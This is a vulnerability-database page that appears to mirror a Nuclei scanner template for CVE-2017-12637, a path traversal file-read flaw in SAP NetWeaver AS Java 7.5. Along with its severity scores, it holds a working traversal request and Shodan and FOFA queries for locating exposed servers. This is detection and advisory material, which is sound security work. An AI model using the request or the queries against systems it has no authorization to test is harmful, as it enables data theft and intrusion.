Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2017-12637
HistoryNov 17, 2020 - 10:14 a.m.

SAP NetWeaver Application Server Java 7.5 - Local File Inclusion

2020-11-1710:14:41
ProjectDiscovery
github.com
45

5 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:N/A:N

7.5 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

0.008 Low

EPSS

Percentile

82.0%

SAP NetWeaver Application Server Java 7.5 is susceptible to local file inclusion in scheduler/ui/js/ffffffffbca41eb4/UIUtilJavaScriptJS. This can allow remote attackers to read arbitrary files via a … (dot dot) in the query string, as exploited in the wild in August 2017, aka SAP Security Note 2486657.

id: CVE-2017-12637

info:
  name: SAP NetWeaver Application Server Java 7.5 - Local File Inclusion
  author: apt-mirror
  severity: high
  description: SAP NetWeaver Application Server Java 7.5 is susceptible to local file inclusion in scheduler/ui/js/ffffffffbca41eb4/UIUtilJavaScriptJS. This can allow remote attackers to read arbitrary files via a .. (dot dot) in the query string, as exploited in the wild in August 2017, aka SAP Security Note 2486657.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the server, leading to unauthorized access, data leakage, and potential system compromise.
  remediation: |
    Apply the latest security patches and updates provided by SAP to fix the LFI vulnerability in SAP NetWeaver Application Server Java 7.5.
  reference:
    - https://download.ernw-insight.de/troopers/tr18/slides/TR18_SAP_SAP-Bugs-The-Phantom-Security.pdf
    - https://web.archive.org/web/20170807202056/http://www.sh0w.top/index.php/archives/7/
    - https://nvd.nist.gov/vuln/detail/CVE-2017-12637
    - http://www.sh0w.top/index.php/archives/7/
    - https://github.com/ARPSyndicate/cvemon
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2017-12637
    cwe-id: CWE-22
    epss-score: 0.00715
    epss-percentile: 0.80483
    cpe: cpe:2.3:a:sap:netweaver_application_server_java:7.50:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: sap
    product: netweaver_application_server_java
    shodan-query: http.favicon.hash:-266008933
    fofa-query: icon_hash=-266008933
  tags: cve2017,cve,sap,lfi,java,traversal

http:
  - method: GET
    path:
      - "{{BaseURL}}/scheduler/ui/js/ffffffffbca41eb4/UIUtilJavaScriptJS?/.."

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "WEB-INF"
          - "META-INF"
        condition: and

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100ed783ef94c829051131156882a1d41055caef81f37348b2ee7a988c2c726c40e022100ee5604c068addc2f9d74d2d87a2c8aebdfeded306b9c27dbd7f8e979ddebcf45:922c64590222798bb761d5b6d8e72950

5 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:N/A:N

7.5 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

0.008 Low

EPSS

Percentile

82.0%

Related for NUCLEI:CVE-2017-12637